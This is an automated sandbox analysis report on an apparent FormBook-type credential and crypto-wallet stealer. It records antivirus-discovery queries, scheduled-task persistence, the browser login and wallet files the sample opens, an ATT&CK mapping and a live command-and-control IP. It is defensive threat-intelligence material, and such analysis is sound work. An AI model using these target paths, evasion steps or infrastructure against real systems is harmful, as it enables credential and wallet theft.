                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Users\user\AppData\Roaming\VcihjWRO.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Users\user\AppData\Roaming\VcihjWRO.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe
                    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: I5pvP0CU6M.exe, 00000009.00000002.2344279205.0000000006192000.00000004.00000020.00020000.00000000.sdmp, I5pvP0CU6M.exe, 00000009.00000002.2323363497.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp, VcihjWRO.exe, 00000011.00000002.2445364928.0000000006B49000.00000004.00000020.00020000.00000000.sdmp
                    Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe
                    WMI Queries:
                      IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe
                    WMI Queries:
                      IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    Source: Yara match
                    File source: dump.pcap, type: PCAP
                    File source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPE
                    File source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPE
                    File source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPE
                    File source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE
                    File source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE
                    File source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    File source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    File source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    File source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    File source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTR
                    File source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    File source: Process Memory Space: VcihjWRO.exe PID: 7568, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe
                    File opened:
                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\I5pvP0CU6M.exe
                    File opened:
                      C:\Users\user\AppData\Roaming\atomic\
                      C:\Users\user\AppData\Roaming\Electrum\wallets\
                      C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      C:\Users\user\AppData\Roaming\Exodus\
                      C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      C:\Users\user\AppData\Roaming\Guarda\
                      C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: C:\Users\user\AppData\Roaming\VcihjWRO.exe
                    File opened:
                      C:\Users\user\AppData\Roaming\atomic\
                      C:\Users\user\AppData\Roaming\Electrum\wallets\
                      C:\Users\user\AppData\Roaming\Ethereum\wallets\
                      C:\Users\user\AppData\Roaming\Exodus\
                      C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      C:\Users\user\AppData\Roaming\Guarda\
                      C:\Users\user\AppData\Roaming\com.liberty.jaxx\

                    Remote Access Functionality

                    Source: Yara match
                    File source: dump.pcap, type: PCAP
                    File source: 11.2.VcihjWRO.exe.4445bf8.1.unpack, type: UNPACKEDPE
                    File source: 11.2.VcihjWRO.exe.445da18.3.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47a46e8.2.unpack, type: UNPACKEDPE
                    File source: 9.2.I5pvP0CU6M.exe.400000.0.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47bc508.0.unpack, type: UNPACKEDPE
                    File source: 11.2.VcihjWRO.exe.445da18.3.raw.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47bc508.0.raw.unpack, type: UNPACKEDPE
                    File source: 11.2.VcihjWRO.exe.4445bf8.1.raw.unpack, type: UNPACKEDPE
                    File source: 0.2.I5pvP0CU6M.exe.47a46e8.2.raw.unpack, type: UNPACKEDPE
                    File source: 00000009.00000002.2322211102.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    File source: 0000000B.00000002.2316828394.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    File source: 00000000.00000002.2220979591.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    File source: Process Memory Space: I5pvP0CU6M.exe PID: 2432, type: MEMORYSTR
                    File source: Process Memory Space: I5pvP0CU6M.exe PID: 6724, type: MEMORYSTR
                    File source: Process Memory Space: VcihjWRO.exe PID: 7224, type: MEMORYSTR
                    File source: Process Memory Space: VcihjWRO.exe PID: 7568, type: MEMORYSTR
                    | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                    | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 221 Windows Management Instrumentation | 1 Scheduled Task/Job | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                    | Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 331 Security Software Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 241 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 241 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 113 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                    Behavior graph (image not reproduced). Behavior Graph ID: 1548177; Sample: I5pvP0CU6M.exe; Startdate: 04/11/2024; Architecture: WINDOWS; Score: 100
                    Processes: I5pvP0CU6M.exe, VcihjWRO.exe, powershell.exe, schtasks.exe, conhost.exe, WmiPrvSE.exe
                    Dropped by I5pvP0CU6M.exe: C:\Users\user\AppData\Roaming\VcihjWRO.exe, PE32; C:\Users\...\VcihjWRO.exe:Zone.Identifier, ASCII; C:\Users\user\AppData\Local\...\tmp4733.tmp, XML; C:\Users\user\AppData\...\I5pvP0CU6M.exe.log, ASCII
                    DNS/IP: api.ip.sb; 45.137.22.248, 49718, 49777, 49784 ROOTLAYERNETNL Netherlands

                    | Source | Detection | Scanner | Label | Link |
                    | I5pvP0CU6M.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook | |
                    | I5pvP0CU6M.exe | 65% | Virustotal | | Browse |
                    | I5pvP0CU6M.exe | 100% | Avira | HEUR/AGEN.1357257 | |
                    | I5pvP0CU6M.exe | 100% | Joe Sandbox ML | | |

                    | Source | Detection | Scanner | Label | Link |
                    | C:\Users\user\AppData\Roaming\VcihjWRO.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook | |

                    No Antivirus matches

                    | Source | Detection | Scanner | Label | Link |
                    | api.ip.sb | 0% | Virustotal | | Browse |

                    | Source | Detection | Scanner | Label | Link |
                    | https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe | |
                    | https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe | |
                    | http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | 0% | URL Reputation | safe | |
                    | http://schemas.datacontract.org/2004/07/ | 0% | URL Reputation | safe | |
                    | http://schemas.xmlsoap.org/soap/envelope/ | 0% | URL Reputation | safe | |
                    | https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe | |
                    | https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe | |
                    | https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe | |
                    | https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe | |
                    | https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe | |
                    | http://schemas.xmlsoap.org/ws/2004/08/addressing | 0% | URL Reputation | safe | |
                    | https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe | |
                    | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
                    | https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe | |
                    | http://schemas.xmlsoap.org/soap/actor/next | 0% | URL Reputation | safe | |
                    | https://ipinfo.io/ip%appdata% | 0% | Virustotal | | Browse |
                    | http://tempuri.org/Endpoint/CheckConnectResponse | 1% | Virustotal | | Browse |
                    | http://tempuri.org/Endpoint/EnvironmentSettings | 2% | Virustotal | | Browse |

                    | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                    | api.ip.sb | unknown | unknown | true | | unknown |

                    | Name | Malicious | Antivirus Detection | Reputation |
                    | 45.137.22.248:55615 | true | | unknown |
                    | http://45.137.22.248:55615/ | true | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
45.137.22.248 | unknown | Netherlands | | 51447 | ROOTLAYERNETNL | true
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1548177
                                                        Start date and time:2024-11-04 04:31:04 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 11s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:24
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:I5pvP0CU6M.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:68b2a6e71c0c904a9aeabfc9adbf7a21.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@23/103@1/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 117
                                                        • Number of non-executed functions: 9
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
04:32:04 | Task Scheduler | Run new task: VcihjWRO path: C:\Users\user\AppData\Roaming\VcihjWRO.exe
22:31:54 | API Interceptor | 38x Sleep call for process: I5pvP0CU6M.exe modified
22:32:01 | API Interceptor | 39x Sleep call for process: powershell.exe modified
22:32:05 | API Interceptor | 34x Sleep call for process: VcihjWRO.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
45.137.22.248 | New_Order_-_PSFK23TT002.exe | malicious | GuLoader | 45.137.22.248/eQobTNPQQm56.bin
45.137.22.248 | BOQ.00987578.exe | malicious | Remcos, GuLoader | 45.137.22.248/ZIWRb187.bin
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ROOTLAYERNETNL | gLsenXDHxP.exe | malicious | RedLine | 185.222.58.240
ROOTLAYERNETNL | DEVIS + FACTURE.exe | malicious | Remcos, GuLoader | 45.137.22.126
ROOTLAYERNETNL | PZNfhfaj9O.exe | malicious | RedLine | 185.222.58.80
ROOTLAYERNETNL | ZxS8mP8uE6.exe | malicious | RedLine | 45.137.22.123
ROOTLAYERNETNL | nu28HwzQwC.exe | malicious | RedLine | 185.222.58.52
ROOTLAYERNETNL | DKO6uy1Tia.exe | malicious | RedLine | 45.137.22.70
ROOTLAYERNETNL | 3BOCQ22aUs.ps1 | malicious | Unknown | 45.137.20.45
ROOTLAYERNETNL | Order Proposal.exe | malicious | RedLine | 45.137.22.121
ROOTLAYERNETNL | l2rMtmFkD6.exe | malicious | RedLine | 185.222.58.233
ROOTLAYERNETNL | HJEbEB40vP.exe | malicious | GuLoader | 185.222.58.113
                                                        Process:C:\Users\user\Desktop\I5pvP0CU6M.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:true
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                        Process:C:\Users\user\AppData\Roaming\VcihjWRO.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.34331486778365
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):2232
                                                        Entropy (8bit):5.380805901110357
                                                        Encrypted:false
                                                        SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//YPUyus:lGLHyIFKL3IZ2KRH9OugQs
                                                        MD5:D0EF8E4DD120F790DD4A5434452024B2
                                                        SHA1:2C48DCEC4D2B6914EC9D50CFD9C252F4ACA64E86
                                                        SHA-256:8F8FB9D5320955882AC16C0025398A4443496B123BB532D92CFA80E78BB98497
                                                        SHA-512:B1022D646EDFDFAD447992363C54EA5D270A8EEEFD2730BE56143BBB8B24945AC65D2AFCECC7600431362773921C8809B57A6364B8FF3C640B47FDF41B6E71EA
                                                        Malicious:false
                                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
